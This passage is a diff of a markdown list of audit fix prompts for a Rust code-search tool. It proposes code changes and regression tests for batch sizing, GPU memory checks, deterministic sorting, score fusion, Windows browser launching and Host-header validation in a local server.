+pub fn serve_max_cluster_nodes() -> usize { /* analog */ }
+pub fn serve_chunk_detail_callers_limit() -> usize {
+    parse_env_usize_clamped("CQS_SERVE_CHUNK_DETAIL_CALLERS", 50, 1, 1_000)
+}
+// ... callees, tests
+```
+
+In `build_chunk_detail`, bind the limits as `?` parameters and emit `truncated: bool` when the cap is hit. Accept `?max_callers / ?max_callees / ?max_tests` query params.
+
+### Notes
+
+- Cytoscape's render ceiling is ~5-10k nodes anyway, so the *default* 50k is too high for the UI; the *cap* 1M is for power-user queries.
+- For graph/cluster, derive the default from `chunk_count` so small projects ship the whole graph.
+
+---
+
+## P2.41 — SHL: `embed_batch_size` default 64 doesn't scale with model dim/seq
+
+**Finding:** P2.41 in audit-triage.md
+**Files:** `src/cli/pipeline/types.rs:143-160`, `src/embedder/mod.rs:685-689`
+
+### Current code
+
+```rust
+pub(crate) fn embed_batch_size() -> usize {
+    match std::env::var("CQS_EMBED_BATCH_SIZE") {
+        Ok(val) => match val.parse::<usize>() {
+            Ok(size) if size > 0 => size,
+            _ => 64,
+        },
+        Err(_) => 64,
+    }
+}
+```
+
+### Replacement
+
+Make the default scale with model dim and seq_len:
+
+```rust
+pub(crate) fn embed_batch_size_for(model: &cqs::embedder::ModelConfig) -> usize {
+    if let Ok(val) = std::env::var("CQS_EMBED_BATCH_SIZE") {
+        if let Ok(size) = val.parse::<usize>() { if size > 0 { return size; } }
+    }
+    // Target ~130 MB per forward-pass tensor:
+    //   batch * seq * dim * 4 bytes
+    // With BGE-large (1024 dim, 512 seq): 64 * 512 * 1024 * 4 ≈ 130 MB
+    // Scale inversely as dim or seq grow.
+    let baseline = 64.0_f64;
+    let dim_factor = 1024.0 / model.dim as f64;
+    let seq_factor = (512.0 / model.max_seq_length as f64).max(0.25);
+    let scaled = (baseline * dim_factor * seq_factor).max(1.0) as usize;
+    // Round to nearest power of 2 for ORT efficiency
+    scaled.next_power_of_two().min(256).max(2)
+}
+```
+
+Replace `embed_batch_size()` callers with `embed_batch_size_for(&self.model_config)`.
+
+### Notes
+
+- BGE-large + 512 seq + 64 batch = OK on RTX 4060 8GB. Nomic-coderank + 2048 seq + 64 batch OOMs.
+- Optional follow-on: query GPU VRAM via `nvml-wrapper` (transitive via cuVS) and target 25% of free VRAM.
+
+---
+
+## P2.42 — SHL: `CagraIndex::gpu_available` no VRAM ceiling — OOMs on 8GB GPUs
+
+**Finding:** P2.42 in audit-triage.md
+**Files:** `src/cagra.rs:262-264`
+
+### Current code
+
+```rust
+pub fn gpu_available() -> bool {
+    cuvs::Resources::new().is_ok()
+}
+```
+
+### Replacement
+
+Probe GPU VRAM and gate on estimated build memory:
+
+```rust
+pub fn gpu_available_for(n_vectors: usize, dim: usize) -> bool {
+    if cuvs::Resources::new().is_err() {
+        return false;
+    }
+    // Estimate build memory: dataset bytes + graph bytes + ~30% slack
+    let dataset_bytes = (n_vectors * dim * 4) as u64;
+    let graph_bytes = (n_vectors * 64 * 4) as u64; // graph_degree default 64
+    let estimated = (dataset_bytes + graph_bytes) * 130 / 100;
+
+    let cap = std::env::var("CQS_CAGRA_MAX_GPU_BYTES")
+        .ok().and_then(|s| s.parse::<u64>().ok())
+        .unwrap_or_else(|| {
+            // Best-effort: query free VRAM. If we cannot, fall back to a
+            // conservative 2 GiB cap so 8 GiB GPUs don't OOM.
+            cuvs_free_vram_bytes().unwrap_or(2 * 1024 * 1024 * 1024)
+        });
+    if estimated > cap * 80 / 100 {
+        tracing::warn!(estimated, cap, "GPU has insufficient free VRAM for CAGRA build — falling back to HNSW");
+        return false;
+    }
+    true
+}
+
+// Back-compat shim:
+pub fn gpu_available() -> bool { Self::gpu_available_for(0, 0) }
+```
+
+Caller in `cli/store.rs::build_vector_index_with_config` switches to `gpu_available_for(chunk_count, dim)`.
+
+### Notes
+
+- `cuvs_free_vram_bytes()` may need to call CUDA's `cudaMemGetInfo` directly via FFI if `cuvs` doesn't expose it. Investigate before signing off.
+- A6000 48GB hosts are unaffected; RTX 4000 8GB benefits.
+
+---
+
+## P2.43 — `semantic_diff` sort tie-breaker (already fixed — pin with test)
+
+**Finding:** P2.43 in audit-triage.md
+**Files:** `src/diff.rs:202-218` — fix already on disk (cascade on `(file, name, chunk_type)`).
+
+### Regression-pin test
+
+```rust
+#[cfg(test)]
+mod determinism_tests {
+    use super::*;
+
+    #[test]
+    fn semantic_diff_sort_is_deterministic_under_shuffled_input() {
+        // Build a DiffResult with 5 modified entries, all similarity=0.73
+        // and varying (file, name) tuples.
+        let entries = vec![
+            DiffEntry { file: "z.rs".into(), name: "a".into(), similarity: Some(0.73), chunk_type: ChunkType::Function, /* ... */ },
+            DiffEntry { file: "a.rs".into(), name: "z".into(), similarity: Some(0.73), chunk_type: ChunkType::Function, /* ... */ },
+            // ... 3 more
+        ];
+        let mut runs = Vec::new();
+        for _ in 0..50 {
+            let mut shuffled = entries.clone();
+            // Use a different random seed each iteration
+            shuffled.shuffle(&mut rand::thread_rng());
+            // Re-run the production sort
+            shuffled.sort_by(/* the cascade from src/diff.rs:208-218 */);
+            runs.push(shuffled);
+        }
+        // Assert all 50 produced the same order
+        for w in runs.windows(2) {
+            assert_eq!(w[0], w[1], "sort must be deterministic across input shuffles");
+        }
+    }
+}
+```
+
+### Notes
+
+- Production code at `src/diff.rs:208-218` already cascades — this test pins it so a future regression is loud.
+
+---
+
+## P2.44 — `is_structural_query` end-of-query keyword (already fixed — pin with test)
+
+**Finding:** P2.44 in audit-triage.md
+**Files:** `src/search/router.rs:806-817` — fix already on disk (uses `words.iter().any(|w| w == kw)` instead of `format!(" {} ", kw)`).
+
+### Regression-pin test
+
+```rust
+#[cfg(test)]
+mod structural_query_tests {
+    use super::*;
+
+    #[test]
+    fn structural_keywords_at_end_of_query_route_correctly() {
+        // Each of these ends with a structural keyword and must be is_structural=true
+        for q in &["find all trait", "show me all trait", "find every impl", "list all enum", "all class", "find enum"] {
+            assert!(is_structural_query(q), "query `{}` must classify as structural", q);
+        }
+    }
+
+    #[test]
+    fn structural_keyword_as_substring_does_not_falsely_match() {
+        // "training" contains "trait" but NOT as a word — must NOT classify structural
+        assert!(!is_structural_query("training pipeline"));
+    }
+}
+```
+
+### Notes
+
+- Production code is correct; this is regression protection.
+
+---
+
+## P2.45 — `bfs_expand` HashMap seed order (already fixed — pin with test)
+
+**Finding:** P2.45 in audit-triage.md
+**Files:** `src/gather.rs:317-330` — fix already on disk (sorts seeds by `(score desc, name asc)` before enqueue).
+
+### Regression-pin test
+
+```rust
+#[cfg(test)]
+mod bfs_seed_order_tests {
+    use super::*;
+
+    #[test]
+    fn bfs_expand_is_deterministic_under_seed_shuffling() {
+        // Build name_scores with two entries scored equally and one above.
+        // Run bfs_expand 100 times; assert the resulting name_scores is
+        // identical across runs.
+    }
+
+    #[test]
+    fn bfs_expand_processes_higher_scoring_seed_first() {
+        // Two seeds: ("foo", 0.9) and ("bar", 0.5).
+        // With max_expanded_nodes=1 (cap before second seed expands),
+        // assert "foo"'s neighbors got into name_scores, not "bar"'s.
+    }
+}
+```
+
+### Notes
+
+- Production code is correct; this pins it.
+
+---
+
+## P2.46 — `contrastive_neighbors` top-K tie-break (already fixed — pin with test)
+
+**Finding:** P2.46 in audit-triage.md
+**Files:** `src/llm/summary.rs:263-282` — fix already on disk (`.then(a.0.cmp(&b.0))` cascade on all three sorts).
+
+### Regression-pin test
+
+```rust
+#[cfg(test)]
+mod contrastive_neighbor_tests {
+    use super::*;
+
+    #[test]
+    fn contrastive_neighbors_top_k_is_deterministic_under_ties() {
+        // Build a similarity matrix where row 0 has multiple entries scoring
+        // exactly the same. Run contrastive_neighbors 50 times; assert the
+        // returned neighbor list is identical every time.
+    }
+}
+```
+
+### Notes
+
+- Production code is correct; this pins it for the cache-cost-sensitive contrastive summary path (~$0.38/run Haiku regenerates if cache misses).
+
+---
+# P2 Part B Fix Prompts (P2.47–P2.92)
+
+## P2.47 — reranker compute_scores unchecked batch_size*stride
+
+**Finding:** P2.47 in audit-triage.md
+**Files:** `src/reranker.rs:368-415`
+**Why:** Listed as algorithm bug; verifying source shows the negative-dim guard AND the `checked_mul` guard already landed.
+
+### Notes
+
+Audit description claimed: "shape[1] = -1 → wraps to usize::MAX" and "batch_size * stride unchecked." Reading `src/reranker.rs:385-405` shows both guards are already present:
 
 ```rust
 let stride = if shape.len() == 2 {
@@ -1424,1009 +3403,4158 @@ let stride = if shape.len() == 2 {
         )));
     }
     dim as usize
-} else {
-    1
-};
-if stride == 0 {
-    return Err(RerankerError::Inference(
-        "Model returned zero-width output tensor".to_string(),
-    ));
-}
+} else { 1 };
+if stride == 0 { ... }
 let expected_len = batch_size.checked_mul(stride).ok_or_else(|| {
     RerankerError::Inference(format!(
         "Reranker output too large: batch_size={batch_size} * stride={stride} overflows usize"
     ))
 })?;
-if data.len() < expected_len {
-    return Err(RerankerError::Inference(format!(
-        "Model output too short: expected {} elements, got {}",
-        expected_len,
-        data.len()
-    )));
-}
 ```
 
-**Why**: ORT's dynamic axis returns -1 when unbound; `-1 as usize == usize::MAX` → `batch_size * stride` wraps silently → `data.len() < expected_len` condition flips direction → reads past the buffer end.
-
-**Verify**: `cargo build --features gpu-index`. `cargo test --features gpu-index --lib reranker`.
+**Action:** No-op — finding is already fixed by AC-V1.29-6 comment block. Verifier should mark P2.47 as resolved without code change. Optionally add a regression test that constructs a fake `(shape=[batch,−1])` path through a mock and asserts the negative-dim error is returned (the panic-on-overflow path is covered by `checked_mul`).
 
 ---
 
-### API-V1.29-1: `project list/remove` ignore `--json`
+## P2.48 — doc_comments select_uncached tertiary tie-break
 
-**File**: `/mnt/c/Projects/cqs/src/cli/commands/infra/project.rs`
+**Finding:** P2.48 in audit-triage.md
+**Files:** `src/llm/doc_comments.rs:222-242`
+**Why:** Verify whether the chunk-id tie-break is missing.
 
-**Current code** (lines 90-118):
+### Notes
+
+Reading `src/llm/doc_comments.rs:231-239`:
+
 ```rust
-ProjectCommand::List => {
-    let registry = ProjectRegistry::load()?;
-    if registry.project.is_empty() {
-        println!("No projects registered.");
-        println!("Use 'cqs project register <name> <path>' to add one.");
+uncached.sort_by(|a, b| {
+    let a_no_doc = a.doc.as_ref().is_none_or(|d| d.trim().is_empty());
+    let b_no_doc = b.doc.as_ref().is_none_or(|d| d.trim().is_empty());
+    // no-doc before thin-doc
+    b_no_doc
+        .cmp(&a_no_doc)
+        .then_with(|| b.content.len().cmp(&a.content.len()))
+        .then_with(|| a.id.cmp(&b.id))
+});
+```
+
+The tertiary `a.id.cmp(&b.id)` already exists (annotated AC-V1.29-7). **Action:** No-op — already fixed. Verifier should mark P2.48 resolved.
+
+---
+
+## P2.49 — map_hunks_to_functions HashMap iteration order
+
+**Finding:** P2.49 in audit-triage.md
+**Files:** `src/impact/diff.rs:38-106` (map_hunks_to_functions), `src/impact/diff.rs:154-168` (cap)
+**Why:** `HashMap<&Path, Vec<…>>` is iterated to produce a Vec — non-deterministic when two files exist; downstream `take(cap)` then drops different functions per run.
+
+### Current code
+
+`src/impact/diff.rs:46-65`:
+
+```rust
+    // Group hunks by file
+    let mut by_file: HashMap<&Path, Vec<&crate::diff_parse::DiffHunk>> = HashMap::new();
+    for hunk in hunks {
+        by_file.entry(&hunk.file).or_default().push(hunk);
+    }
+
+    // PF-1: Batch-fetch all file chunks in a single query instead of N queries
+    let normalized_paths: Vec<String> = by_file
+        .keys()
+        .map(|f| normalize_slashes(&f.to_string_lossy()))
+        .collect();
+    let origin_refs: Vec<&str> = normalized_paths.iter().map(|s| s.as_str()).collect();
+    let chunks_by_origin = match store.get_chunks_by_origins_batch(&origin_refs) {
+        Ok(m) => m,
+        Err(e) => {
+            tracing::warn!(error = %e, "Failed to batch-fetch chunks for diff hunks");
+            return functions;
+        }
+    };
+
+    for (file, file_hunks) in &by_file {
+```
+
+### Replacement
+
+After building `functions` via map (or after returning from `map_hunks_to_functions`), sort deterministically. Easiest: change `by_file` to `BTreeMap` so iteration is by path:
+
+```rust
+use std::collections::BTreeMap;
+// ...
+let mut by_file: BTreeMap<&Path, Vec<&crate::diff_parse::DiffHunk>> = BTreeMap::new();
+for hunk in hunks {
+    by_file.entry(&hunk.file).or_default().push(hunk);
+}
+```
+
+And, before returning, sort `functions` for full determinism:
+
+```rust
+functions.sort_by(|a, b| {
+    a.file.cmp(&b.file)
+        .then(a.line_start.cmp(&b.line_start))
+        .then(a.name.cmp(&b.name))
+});
+functions
+```
+
+### Notes
+
+The `seen: HashSet<String>` dedup uses `chunk.name`, but only first-seen wins — under HashMap order this is also non-deterministic. The final sort eliminates both effects. Add a regression test seeding 3 files with overlapping function names and asserting `map_hunks_to_functions` is identical across 100 calls.
+
+---
+
+## P2.50 — search_reference threshold/weight ordering
+
+**Finding:** P2.50 in audit-triage.md
+**Files:** `src/reference.rs:231-285`
+**Why:** Underlying search caps at `limit` against unweighted scores AND filters at unweighted threshold; post-weight retain double-filters. Multi-ref ranking under-samples corpus when weight<1.
+
+### Current code
+
+`src/reference.rs:242-258`:
+
+```rust
+    let mut results = ref_idx.store.search_filtered_with_index(
+        query_embedding,
+        filter,
+        limit,
+        threshold,
+        ref_idx.index.as_deref(),
+    )?;
+    if apply_weight {
+        for r in &mut results {
+            r.score *= ref_idx.weight;
+        }
+        // Re-filter after weight: results that passed raw threshold may fall
+        // below after weighting (consistent with name_only path)
+        results.retain(|r| r.score >= threshold);
+    }
+    Ok(results)
+```
+
+### Replacement
+
+```rust
+    let raw_threshold = if apply_weight && ref_idx.weight > 0.0 {
+        threshold / ref_idx.weight
     } else {
-        println!("Registered projects:");
-        for entry in &registry.project {
-            let status = if entry.path.join(".cqs/index.db").exists()
-                || entry.path.join(".cq/index.db").exists()
-            {
-                "ok".green().to_string()
-            } else {
-                "missing index".red().to_string()
-            };
-            println!("  {} — {} [{}]", entry.name, entry.path.display(), status);
+        threshold
+    };
+    let raw_limit = if apply_weight {
+        // 2× over-fetch leaves headroom for weighted retain step
+        limit.saturating_mul(2).max(limit)
+    } else {
+        limit
+    };
+    let mut results = ref_idx.store.search_filtered_with_index(
+        query_embedding,
+        filter,
+        raw_limit,
+        raw_threshold,
+        ref_idx.index.as_deref(),
+    )?;
+    if apply_weight {
+        for r in &mut results {
+            r.score *= ref_idx.weight;
+        }
+        results.retain(|r| r.score >= threshold);
+        results.sort_by(|a, b| {
+            b.score
+                .total_cmp(&a.score)
+                .then(a.chunk.id.cmp(&b.chunk.id))
+        });
+        results.truncate(limit);
+    }
+    Ok(results)
+```
+
+Mirror the same shape in `search_reference_by_name` at `src/reference.rs:265-285` — its `retain(|r| r.score * weight >= threshold)` already applies the right boundary, but it doesn't over-fetch from `search_by_name`. Pass a relaxed `limit * 2` to `store.search_by_name`, retain+weight+sort+truncate at the end.
+
+### Notes
+
+`SearchResult.chunk.id` (or whatever the canonical id field is) is the deterministic tertiary key. Confirm field path before applying.
+
+---
+
+## P2.51 — find_type_overlap chunk_info HashMap iteration
+
+**Finding:** P2.51 in audit-triage.md
+**Files:** `src/related.rs:131-157`
+**Why:** Three sources of HashMap iteration leak into `cqs related` output: (a) `chunk_info` `or_insert` retains first arrival, (b) sort lacks tie-break on equal counts, (c) earlier `type_names` collected from HashSet.
+
+### Current code
+
+`src/related.rs:128-157`:
+
+```rust
+    let mut type_counts: HashMap<String, u32> = HashMap::new();
+    let mut chunk_info: HashMap<String, (PathBuf, u32)> = HashMap::new();
+
+    for chunks in results.values() {
+        for chunk in chunks {
+            if chunk.name == target_name {
+                continue;
+            }
+            if !matches!(
+                chunk.chunk_type,
+                crate::language::ChunkType::Function | crate::language::ChunkType::Method
+            ) {
+                continue;
+            }
+            *type_counts.entry(chunk.name.clone()).or_insert(0) += 1;
+            chunk_info
+                .entry(chunk.name.clone())
+                .or_insert((chunk.file.clone(), chunk.line_start));
         }
     }
-    Ok(())
-}
-ProjectCommand::Remove { name } => {
-    let mut registry = ProjectRegistry::load()?;
-    if registry.remove(name)? {
-        println!("Removed '{}'", name);
+
+    tracing::debug!(
+        candidates = type_counts.len(),
+        "Type overlap candidates found"
+    );
+
+    // Sort by overlap count descending
+    let mut sorted: Vec<(String, u32)> = type_counts.into_iter().collect();
+    sorted.sort_by_key(|e| std::cmp::Reverse(e.1));
+    sorted.truncate(limit);
+```
+
+### Replacement
+
+```rust
+    let mut type_counts: HashMap<String, u32> = HashMap::new();
+    let mut chunk_info: HashMap<String, (PathBuf, u32)> = HashMap::new();
+
+    // Iterate `results` in deterministic key order so `or_insert` first-wins
+    // is reproducible across runs.
+    let mut keys: Vec<&String> = results.keys().collect();
+    keys.sort();
+    for key in keys {
+        let chunks = &results[key];
+        for chunk in chunks {
+            if chunk.name == target_name {
+                continue;
+            }
+            if !matches!(
+                chunk.chunk_type,
+                crate::language::ChunkType::Function | crate::language::ChunkType::Method
+            ) {
+                continue;
+            }
+            *type_counts.entry(chunk.name.clone()).or_insert(0) += 1;
+            // Pick min (file, line) so two identical-named functions across files
+            // produce a deterministic representative regardless of insertion order.
+            let entry = (chunk.file.clone(), chunk.line_start);
+            chunk_info
+                .entry(chunk.name.clone())
+                .and_modify(|cur| {
+                    if entry < *cur {
+                        *cur = entry.clone();
+                    }
+                })
+                .or_insert(entry);
+        }
+    }
+
+    tracing::debug!(
+        candidates = type_counts.len(),
+        "Type overlap candidates found"
+    );
+
+    // Sort by count desc, then name asc for stable tie-break.
+    let mut sorted: Vec<(String, u32)> = type_counts.into_iter().collect();
+    sorted.sort_by(|a, b| b.1.cmp(&a.1).then(a.0.cmp(&b.0)));
+    sorted.truncate(limit);
+```
+
+Also, locate the `type_names` collection earlier (~`src/related.rs:59-65`):
+
+```rust
+let mut type_names: Vec<&str> = type_set.iter().copied().collect();
+type_names.sort();
+type_names.dedup();
+```
+
+### Notes
+
+Verify the `type_names` site shape before edit — finding cites lines 59-65 but the actual variable name and source set need to be confirmed via Read.
+
+---
+
+## P2.52 — CAGRA search_with_filter under-fills when included<k
+
+**Finding:** P2.52 in audit-triage.md
+**Files:** `src/cagra.rs:520-598`
+**Why:** When filter retains fewer than `k` candidates, CAGRA is asked for `k` slots and silently returns under-filled results; when `k > itopk_max` AND `included < k`, CAGRA errors and `search_impl` returns empty without retry at feasible `k`.
+
+### Current code
+
+`src/cagra.rs:540-597`:
+
+```rust
+        // Build bitset on host: evaluate predicate for each vector
+        let n = self.id_map.len();
+        let n_words = n.div_ceil(32);
+        let mut bitset = vec![0u32; n_words];
+        let mut included = 0usize;
+        for (i, id) in self.id_map.iter().enumerate() {
+            if filter(id) {
+                bitset[i / 32] |= 1u32 << (i % 32);
+                included += 1;
+            }
+        }
+
+        // If everything passes the filter, use unfiltered search (faster)
+        if included == n {
+            return CagraIndex::search(self, query, k);
+        }
+
+        // If nothing passes, no results
+        if included == 0 {
+            return Vec::new();
+        }
+        // ...
+        self.search_impl(&gpu, query, k, Some(&bitset_device))
+```
+
+### Replacement
+
+```rust
+        // Cap effective k at the count of vectors that actually pass the
+        // filter — asking CAGRA for more slots than feasible silently
+        // under-fills (or, when k > itopk_max, errors out and zeroes the
+        // result). Both modes hide a "no candidates" answer behind the same
+        // empty Vec a real "no matches" would produce.
+        let effective_k = k.min(included);
+        if effective_k < k {
+            tracing::debug!(
+                requested = k,
+                effective = effective_k,
+                included,
+                "CAGRA filtered search: capping k at included to avoid under-fill"
+            );
+        }
+        // ...
+        self.search_impl(&gpu, query, effective_k, Some(&bitset_device))
+```
+
+### Notes
+
+Caller (`Store::search_filtered_with_index`) does not currently propagate a `truncated` flag for under-fill; the audit recommends a follow-on but mark out of scope here. The minimal fix is the `effective_k` cap. Add a regression test that builds a 12-vector index, calls `search_with_filter` with `k=20`, asserts result length == 12 and no error logged.
+
+---
+
+## P2.53 — Hybrid SPLADE alpha=0 unbounded score cliff
+
+**Finding:** P2.53 in audit-triage.md
+**Files:** `src/search/query.rs:649-672`
+**Why:** `alpha == 0` branch emits `1.0 + s` (in `[1.0, 2.0]`) while dense path emits `[-1, 1]` cosine; any positive sparse signal beats every dense match.
+
+### Current code
+
+`src/search/query.rs:649-672`:
+
+```rust
+        let mut fused: Vec<crate::index::IndexResult> = all_ids
+            .iter()
+            .map(|id| {
+                let d = dense_scores.get(id).copied().unwrap_or(0.0);
+                let s = sparse_scores.get(id).copied().unwrap_or(0.0);
+                let score = if alpha <= 0.0 {
+                    // Pure re-rank mode: SPLADE score for chunks it found,
+                    // cosine score (demoted) for chunks it didn't.
+                    // This preserves cosine ordering for SPLADE-unknown chunks
+                    // while letting SPLADE override when it has signal.
+                    if s > 0.0 {
+                        1.0 + s
+                    } else {
+                        d
+                    }
+                } else {
+                    alpha * d + (1.0 - alpha) * s
+                };
+                crate::index::IndexResult {
+                    id: id.to_string(),
+                    score,
+                }
+            })
+            .collect();
+```
+
+### Replacement
+
+```rust
+        let mut fused: Vec<crate::index::IndexResult> = all_ids
+            .iter()
+            .map(|id| {
+                let d = dense_scores.get(id).copied().unwrap_or(0.0);
+                let s = sparse_scores.get(id).copied().unwrap_or(0.0);
+                let score = if alpha <= 0.0 {
+                    // Pure re-rank mode: SPLADE-found chunks get a small
+                    // additive boost over their dense cosine, so SPLADE
+                    // signal nudges ranking without dominating it. The
+                    // boost stays within the dense [-1, 1] band — no
+                    // magic "1.0 + s" cliff that drowns strong cosine
+                    // matches under any positive sparse signal.
+                    let boost = s * 0.1;
+                    d + boost
+                } else {
+                    alpha * d + (1.0 - alpha) * s
+                };
+                crate::index::IndexResult {
+                    id: id.to_string(),
+                    score,
+                }
+            })
+            .collect();
+```
+
+### Notes
+
+Add a regression test: dense pool `[(A, 0.95)]`, sparse pool `[(B, 0.001 normalized)]`, alpha=0 → expect `A` first, not `B@1.001`. Eval drift expected — re-run dev-set R@5 after this change.
+
+---
+
+## P2.54 — apply_scoring_pipeline name_boost sign-flip
+
+**Finding:** P2.54 in audit-triage.md
+**Files:** `src/search/scoring/candidate.rs:283-298`
+**Why:** Out-of-range `name_boost` (CLI accepts arbitrary finite f32) makes `(1 - nb)` negative; `.max(0.0)` then nukes good matches. Even in-range, raw embedding can be negative, contaminating the blend.
+
+### Current code
+
+`src/search/scoring/candidate.rs:282-298`:
+
+```rust
+    let base_score = if let Some(matcher) = ctx.name_matcher {
+        let n = name.unwrap_or("");
+        let name_score = matcher.score(n);
+        (1.0 - ctx.filter.name_boost) * embedding_score + ctx.filter.name_boost * name_score
     } else {
-        println!("Project '{}' not found", name);
+        embedding_score
+    };
+
+    if let Some(matcher) = ctx.glob_matcher {
+        if !matcher.is_match(file_part) {
+            return None;
+        }
     }
-    Ok(())
-}
+
+    let chunk_name = name.unwrap_or("");
+    let mut score = base_score.max(0.0) * ctx.note_index.boost(file_part, chunk_name);
 ```
 
-**Fix**:
-
-Mirror the `Search` subcommand pattern (which correctly honors `cli.json || output.json`). Add `output: TextJsonArgs` to `List` and `Remove` variants, then branch on `cli.json || output.json`:
+### Replacement
 
 ```rust
-// Enum variant:
-List {
-    #[command(flatten)]
-    output: TextJsonArgs,
-},
-Remove {
-    name: String,
-    #[command(flatten)]
-    output: TextJsonArgs,
-},
-
-// Handler:
-ProjectCommand::List { output } => {
-    let json = cli.json || output.json;
-    let registry = ProjectRegistry::load()?;
-    if json {
-        #[derive(serde::Serialize)]
-        struct ProjectListEntry { name: String, path: String, indexed: bool }
-        let entries: Vec<_> = registry.project.iter().map(|e| ProjectListEntry {
-            name: e.name.clone(),
-            path: cqs::normalize_path(&e.path),
-            indexed: e.path.join(".cqs/index.db").exists()
-                || e.path.join(".cq/index.db").exists(),
-        }).collect();
-        crate::cli::json_envelope::emit_json(&entries)?;
+    // Clamp inputs to [0, 1] before linear interpolation so the blend is
+    // always between two same-range numbers and never sign-flips. This
+    // closes the failure mode where an out-of-range `name_boost` produces
+    // `(1 - nb) < 0`, multiplies a strong embedding match by a negative
+    // weight, and the downstream `.max(0.0)` then deletes it silently.
+    let embedding_score = embedding_score.clamp(0.0, 1.0);
+    let nb = ctx.filter.name_boost.clamp(0.0, 1.0);
+    let base_score = if let Some(matcher) = ctx.name_matcher {
+        let n = name.unwrap_or("");
+        let name_score = matcher.score(n);
+        (1.0 - nb) * embedding_score + nb * name_score
     } else {
-        // existing text branch
+        embedding_score
+    };
+
+    if let Some(matcher) = ctx.glob_matcher {
+        if !matcher.is_match(file_part) {
+            return None;
+        }
+    }
+
+    let chunk_name = name.unwrap_or("");
+    let mut score = base_score.max(0.0) * ctx.note_index.boost(file_part, chunk_name);
+```
+
+### Notes
+
+P1.16 closes the CLI side (clamp at SearchFilter construction). This finding is the in-function defense-in-depth — keep both fixes. Add a property test: for any `name_boost`, `embedding_score`, `name_score` ∈ `f32::finite()`, the output is in `[0.0, ∞)`.
+
+---
+
+## P2.55 — open_browser uses explorer.exe on Windows
+
+**Finding:** P2.55 in audit-triage.md
+**Files:** `src/cli/commands/serve.rs:89-104`
+**Why:** `explorer.exe <url>` doesn't navigate URLs reliably and can strip `?token=...` query strings. With auth on by default, this breaks the `--open` flow on Windows.
+
+### Current code
+
+`src/cli/commands/serve.rs:87-104`:
+
+```rust
+fn open_browser(url: &str) -> Result<()> {
+    #[cfg(target_os = "linux")]
+    let cmd = "xdg-open";
+    #[cfg(target_os = "macos")]
+    let cmd = "open";
+    #[cfg(target_os = "windows")]
+    let cmd = "explorer.exe";
+
+    std::process::Command::new(cmd)
+        .arg(url)
+        .stdout(std::process::Stdio::null())
+        .stderr(std::process::Stdio::null())
+        .spawn()
+        .with_context(|| format!("Failed to spawn {cmd} {url}"))?;
+    Ok(())
+}
+```
+
+### Replacement
+
+```rust
+fn open_browser(url: &str) -> Result<()> {
+    // PB-V1.30: on Windows, `explorer.exe <url>` doesn't reliably navigate
+    // and can strip query strings (the `?token=...` we depend on for auth).
+    // `cmd /C start "" "<url>"` hands the URL to the user's default browser
+    // through the documented Win32 protocol-handler path. The empty `""` is
+    // required because `start`'s first quoted arg is the window title.
+    #[cfg(target_os = "windows")]
+    {
+        std::process::Command::new("cmd")
+            .args(["/C", "start", "", url])
+            .stdout(std::process::Stdio::null())
+            .stderr(std::process::Stdio::null())
+            .spawn()
+            .with_context(|| format!("Failed to spawn cmd /C start \"\" {url}"))?;
+        return Ok(());
+    }
+
+    #[cfg(target_os = "linux")]
+    let cmd = "xdg-open";
+    #[cfg(target_os = "macos")]
+    let cmd = "open";
+
+    #[cfg(any(target_os = "linux", target_os = "macos"))]
+    {
+        std::process::Command::new(cmd)
+            .arg(url)
+            .stdout(std::process::Stdio::null())
+            .stderr(std::process::Stdio::null())
+            .spawn()
+            .with_context(|| format!("Failed to spawn {cmd} {url}"))?;
     }
     Ok(())
 }
+```
 
-ProjectCommand::Remove { name, output } => {
-    let json = cli.json || output.json;
-    let mut registry = ProjectRegistry::load()?;
-    let removed = registry.remove(name)?;
-    if json {
-        crate::cli::json_envelope::emit_json(&serde_json::json!({
-            "name": name,
-            "removed": removed,
-        }))?;
-    } else if removed {
-        println!("Removed '{}'", name);
+---
+
+## P2.56 — NTFS/FAT32 mtime equality
+
+**Finding:** P2.56 in audit-triage.md
+**Files:** `src/cli/watch.rs:551-560`
+**Why:** Watch loop uses exact `SystemTime` equality on cached mtime. FAT32 USB mounts have 2s mtime resolution — two saves within 2s collide, second save skipped.
+
+### Current code
+
+`src/cli/watch.rs:551-561` (`prune_last_indexed_mtime`) is *not* the equality site — it's the prune. The actual equality check lives in `should_reindex` callers. Audit cites `:551-560` as a proxy / pointer.
+
+### Notes
+
+Locate the actual mtime equality site via grep for `last_indexed_mtime.get` or `last_indexed_mtime` reads against a saved value. It's likely in `process_file_changes` or `should_reindex`. Once located, replace exact `==` with one of:
+
+1. `<` against bucketed mtime when `is_wsl_drvfs_path(path)` is true:
+   ```rust
+   let stale = if is_wsl_drvfs_path(path) {
+       // 2 s buckets — FAT32 mtime granularity floor
+       cached_mtime + Duration::from_secs(2) > current_mtime
+   } else {
+       cached_mtime == current_mtime
+   };
+   ```
+2. Or: fall back to content-hash equality on suspicious mtime ties (parser already computes content hash).
+
+Verifier should grep for the equality site, apply option (1), add a test that constructs two `SystemTime`s 1 second apart, the WSL path triggers the bucketed comparison, the non-WSL path keeps strict equality. Document the FAT32 caveat in the function header.
+
+---
+
+## P2.57 — enforce_host_allowlist accepts missing Host
+
+**Finding:** P2.57 in audit-triage.md
+**Files:** `src/serve/mod.rs:230-251`
+**Why:** Missing-Host bypass is a unit-test ergonomic in production middleware. HTTP/1.0 + raw nc clients reach the handler with no allowlist check.
+
+### Current code
+
+`src/serve/mod.rs:234-251`:
+
+```rust
+async fn enforce_host_allowlist(
+    State(allowed): State<AllowedHosts>,
+    req: Request,
+    next: Next,
+) -> Result<Response, (StatusCode, &'static str)> {
+    match req.headers().get(header::HOST) {
+        None => Ok(next.run(req).await),
+        Some(value) => {
+            let host = value.to_str().unwrap_or("");
+            if allowed.contains(host) {
+                Ok(next.run(req).await)
+            } else {
+                tracing::warn!(host = %host, "serve: rejected request with disallowed Host header");
+                Err((StatusCode::BAD_REQUEST, "disallowed Host header"))
+            }
+        }
+    }
+}
+```
+
+### Replacement
+
+```rust
+async fn enforce_host_allowlist(
+    State(allowed): State<AllowedHosts>,
+    req: Request,
+    next: Next,
+) -> Result<Response, (StatusCode, &'static str)> {
+    let host = match req.headers().get(header::HOST) {
+        Some(v) => v.to_str().unwrap_or(""),
+        None => {
+            // SEC-V1.30: missing-Host is malformed in production (HTTP/1.1
+            // requires Host; hyper synthesizes one on real traffic). Reject
+            // 400 instead of passing through — closes the DNS-rebinding
+            // bypass for HTTP/1.0 clients and raw nc requests. Tests that
+            // need to skip the allowlist now stamp a Host header in the
+            // Request::builder().
+            tracing::warn!("serve: rejected request missing Host header");
